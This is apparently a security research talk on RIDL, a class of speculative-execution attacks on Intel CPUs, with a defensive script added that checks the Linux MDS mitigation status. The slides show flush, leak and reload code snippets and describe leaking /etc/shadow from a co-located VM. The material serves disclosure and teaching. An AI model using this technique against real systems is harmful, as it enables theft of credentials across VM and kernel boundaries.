#### ROGUE IN-FLIGHT DATA LOAD

<u>Stephan van Schaik</u> - Alyssa Milburn

Sebastian Österlund - Pietro Frigo - Giorgi Maisuradze\*

Kaveh Razavi - Herbert Bos - Cristiano Giuffrida





What can we still do as an attacker?

# Meet **Rogue In-flight Data Load** or RIDL

A new **class** of speculative execution attacks that knows no boundaries

Privilege levels are just a social construct



We can leak between hardware threads!



But can we leak across other security domains?



Yes, we can!



We leak from the kernel ...



... across VMs ...



... from the hypervisor ...



... and from SGX enclaves!

We leak across all security domains!

Can we leak in the web browser?

Yes, we can!

- We reproduced RIDL in Mozilla Firefox
- ⇒ No need for special instructions



Memory addresses are a social construct too



Previous attacks show we can speculatively leak from addresses

- Spectre: access out-of-bounds addresses
- Meltdown: leak kernel data from virtual addresses
- Foreshadow: leak from physical address

Our mitigation efforts focus on isolating/masking addresses

- Spectre: mask array index to limit address range
- Meltdown: unmap kernel addresses from userspace
- Foreshadow: invalidate physical address

# Example

#### **MELTDOWN**



Problem: leak kernel data from virtual addresses

Solution: unmap kernel addresses

- Previous attacks exploit addressing
- Mitigation by isolating/masking addresses

RIDL does *not* depend on addressing:

- ⇒ Bypass all address-based security checks
- ⇒ Makes RIDL hard to mitigate

What CPUs does RIDL affect?

We bought Intel and AMD CPUs from almost every generation since 2008

... and sent the invoices to Herbert





#### Side-channel Vulnerability and Mitigation Methods

The security of our products is one of our most important priorities.

The threat environment continues to evolve. Intel is committed to investing in the security and reliability of our products, and to working to safeguard users'

Specific to side-channel vulnerabilities, mitigations have been provided for all variants noted below through a combination of updates for:

- Firmware
- Operating systems
- Virtual Machine Manager\*

System manufacturers have incorporated these updates. Some Intel products may contain hardware mitigations. See the table below for mitigation details:

Vulnerability and Mitigation Method

| Processor Model | Variant 1 (Bounds Check Bypass; also known as Spectre) | Variant 2 (Branch Target Injection; also known as Spectre) | Variant 3 (Rogue Data Cache Load; also known as Meltdown) | Variant 3a (Rogue System Register Read; also known as Meltdown) | Variant 4 (Rogue System Register Read) | Variant 5 (L1 Terminal Fault) |
|---|---|---|---|---|---|---|
| Intel® Core™ i9-9900k | OS/VMM | Firmware +OS | Hardware | Firmware | Firmware +OS | Hardware |
| Intel® Core™ i7-9700k | OS/VMM | Firmware +OS | Hardware | Firmware | Firmware +OS | Hardware |
| Intel® Core™ i5-9600k | OS/VMM | Firmware +OS | Hardware | Firmware | Firmware +OS | Hardware |





Documentation

Content Type Product Information & Documentation

Article ID 000031501

Last Reviewed 11/21/2018


#### Intel announces Coffee Lake Refresh


# In-silicon mitigations against Meltdown and Foreshadow


#### Let's buy the Intel Core i9-9900K!

... and send another invoice to Herbert



We got it the day after we submitted the paper

RIDL works regardless of these in-silicon mitigations

- ✓ Intel Core i9-9900K (Coffee Lake R) 2018
- ✓ Intel Xeon Silver 4110 (Skylake SP) 2017
- ✓ Intel Core i7-8700K (Coffee Lake) 2017
- ✓ Intel Core i7-7800X (Skylake X) 2017
- ✓ Intel Core i7-7700K (Kaby Lake) 2017
- ✓ Intel Core i7-6700K (Skylake) 2015
- ✓ Intel Core i7-5775C (Broadwell) 2015
- ✓ Intel Core i7-4790 (Haswell) 2014
- ✓ Intel Core i7-3770K (Ivy Bridge) 2012
- ✓ Intel Core i7-2600 (Sandy Bridge) 2011
- ✓ Intel Core i3-550 (Westmere) 2010
- ✓ Intel Core i7-920 (Nehalem) 2008

## **AMD**

We also tried to reproduce it on AMD

RIDL does *not* affect AMD



But where are we actually leaking from?





Previous attacks had it easy, they leak from caches



Caches are well documented and well understood.



But RIDL does not leak from caches!



But what else is there to leak from?



There are other internal CPU buffers



Line Fill Buffers, Store Buffers and Load Ports



But there is more!



**Uncached Memory** 



RIDL is a **class** of speculative execution attacks also known as **M**icro-architectural **D**ata **S**ampling

Let's focus on one particular instance:

Line Fill Buffers

#### **MANUALS**

MEM\_LOAD\_UOPS\_RETIRED.HIT\_LFB\_PS - Counts demand loads that hit in the line fill buffer (LFB). A LFB entry is allocated every time a miss occurs in the L1 DCache. When a load hits at this location it means that a previous load, store or hardware prefetch has already missed in the L1 DCache and the data fetch is in progress. Therefore the cost of a hit in the LFB varies. This event may count cache-line split loads that miss in the L1 DCache but do not miss the LLC.

On 32-byte Intel AVX loads, all loads that miss in the L1 DCache show up as hits in the L1 DCache or hits in the LFB. They never show hits on any other level of memory hierarchy. Most loads arise from the line fill buffer (LFB) when Intel AVX loads miss in the L1 DCache.

- We first read the manuals
- Some references to internal CPU buffers
- But no further explanation
- Where would you even start?

That's why we started reading patents instead!



We read a lot of patents, and survived!

So today I can tell you a bit more about them

But wait, what are these Line Fill Buffers?

They were never mentioned during my Computer Architecture courses but maybe I didn't pay attention

#### LINE FILL BUFFERS?



Central buffer between execution units, L1d and L2 to improve memory throughput

#### Multiple roles:

- Asynchronous memory requests
- Load squashing
- Write combining
- Uncached memory

CPU design: what to do on a cache miss?

- Send out memory request
- Wait for completion
- Blocks other loads/stores

Solution: keep track of address in LFB

- Send out memory request
- Allocate LFB entry
- Store address in LFB
- Serve other loads/stores
- Pending request eventually completes

Allocate LFB entry: may contain data from previous load

RIDL exploits this

Experiments in the paper



Conclusion: our primary RIDL instance leaks from Line Fill Buffers

How do we mount a RIDL attack?

[Diagram: an Attacker VM and a Victim VM on the same server, with the Line Fill Buffers between them; the Victim VM runs an SSH server that reads /etc/shadow]

Victim VM in the cloud

We get a VM on the same server

We make sure it is co-located

Victim VM runs an SSH server

#### **CHALLENGES**

- X Getting data in flight
- X Leaking data
- X Filtering data

How do we get data in flight?

We run an SSH client...



... that keeps connecting to the SSH server



The SSH server loads /etc/shadow through LFB



The contents from /etc/shadow are in flight

#### **LEAKING**

Now that the data is in flight, we want to leak it

We run our RIDL program on our server...

...which leaks the data from the LFB

What does this program look like?

#### (1) FLUSH

```
/* Evict all 256 probe entries (one per page) from the cache. */
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
    /* Leak in-flight data from an invalid or unmapped page;
       also works for demand paging. */
    char byte = *(volatile char *)NULL;
    /* Use the leaked byte as an index into our probe array. */
    char *p = probe + byte * 4096;
    *(volatile char *)p;
    _xend();
}
```

#### (3) RELOAD

```
/* Time the reload of every probe entry. */
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}
```

#### **Probe Array**

Reloading a probe entry that was not touched is **SLOW**; reloading the entry indexed by the leaked byte is **FAST**.

## **CHALLENGES**

- ✓ Getting data in flight
- X Leaking data
- X Filtering data



RIDL is like drinking from a fire hose



You just get whatever data is in flight!

How can we filter data?

- We want to leak from /etc/shadow
- First line /etc/shadow is for root
- Starts with "root:"
- Use prefix matching:
  - Match ⇒ we learn a new byte
  - No Match ⇒ discard

#### **Known Prefix**

| r | o | o | t | : |
|---|---|---|---|---|

[Figure: sampled in-flight data is compared against the known prefix. The sample `https://` is labelled No Match; further panels are labelled Match and No Match, and a sample `README.T` is shown.]

## **CHALLENGES**

- ✓ Getting data in flight
- ✓ Leaking data
- X Filtering data

More examples in the paper:

- Leaking internal CPU data (e.g. page tables)
- Arbitrary kernel read
- Leaking in the browser

### **MITIGATION**

- Same-thread:
  - `verw` overwrites all buffers
  - Special Assembly snippets
- Cross-thread:
  - Complex scheduling and synchronization
  - Disable Intel Hyper-Threading®
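
The same-thread / cross-thread split above can be checked on a Linux host. The following is an added example (not the authors' MDS tool and not code from the talk) that classifies the kernel's MDS status line into those two cases. It assumes the Linux sysfs file `/sys/devices/system/cpu/vulnerabilities/mds` and its status strings, which come from the kernel and not from the slides; the sample lines are constructed.

```sh
#!/bin/sh
# Added example: map the Linux kernel's MDS status line onto the two cases on
# the mitigation slide (same-thread buffer clearing, cross-thread SMT exposure).
# Assumption: the kernel exposes its MDS status at this sysfs path.
MDS_SYSFS=/sys/devices/system/cpu/vulnerabilities/mds

# same_thread_state STATUS -> not_affected | cleared | no_microcode | vulnerable | unknown
same_thread_state() {
    case "$1" in
        "Not affected"*)                  echo not_affected ;;
        "Mitigation: Clear CPU buffers"*) echo cleared ;;
        # Kernel tries to clear buffers, but the microcode update is missing.
        "Vulnerable: Clear CPU buffers attempted, no microcode"*)
                                          echo no_microcode ;;
        "Vulnerable"*)                    echo vulnerable ;;
        *)                                echo unknown ;;
    esac
}

# cross_thread_state STATUS -> not_affected | smt_disabled | smt_mitigated | smt_vulnerable | unknown
cross_thread_state() {
    case "$1" in
        "Not affected"*)    echo not_affected ;;
        *"SMT disabled"*)   echo smt_disabled ;;
        *"SMT mitigated"*)  echo smt_mitigated ;;
        *"SMT vulnerable"*) echo smt_vulnerable ;;
        # Includes "SMT Host state unknown", which a guest reports because it
        # cannot see how the hypervisor schedules sibling threads.
        *)                  echo unknown ;;
    esac
}

# mds_verdict STATUS -> OK | PARTIAL | EXPOSED | UNKNOWN
mds_verdict() {
    st=$(same_thread_state "$1")
    ct=$(cross_thread_state "$1")
    case "$st/$ct" in
        not_affected/*)                             echo OK ;;
        cleared/smt_disabled|cleared/smt_mitigated) echo OK ;;
        # Buffers are cleared on transitions, but a sibling hardware thread
        # can still sample in-flight data.
        cleared/smt_vulnerable)                     echo PARTIAL ;;
        no_microcode/*|vulnerable/*)                echo EXPOSED ;;
        *)                                          echo UNKNOWN ;;
    esac
}

# Constructed sample status lines (not captured from a real machine).
for s in \
    "Mitigation: Clear CPU buffers; SMT vulnerable" \
    "Mitigation: Clear CPU buffers; SMT disabled" \
    "Vulnerable: Clear CPU buffers attempted, no microcode; SMT vulnerable" \
    "Not affected"
do
    printf '%-8s %s\n' "$(mds_verdict "$s")" "$s"
done

# Report for the running system when the kernel exposes the file.
if [ -r "$MDS_SYSFS" ]; then
    status=$(cat "$MDS_SYSFS")
    printf 'this host: %s (%s)\n' "$(mds_verdict "$status")" "$status"
fi
```

A `PARTIAL` verdict corresponds to the slide's cross-thread case: it is resolved by disabling Hyper-Threading or by scheduling that keeps mutually untrusted code off sibling threads.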

Disclosure process

Sep Oct Nov Dec Jan Feb Mar Apr May















# **MDS TOOL**

We wrote a tool to verify your system:



- Spectre and Meltdown, just one mistake?
- New class of speculative execution attacks
- Many more buffers other than caches to leak from
- Does not rely on addresses ⇒ hard to mitigate
- Across security domains, and in the browser

@themadstephan @vu5ec

https://mdsattacks.com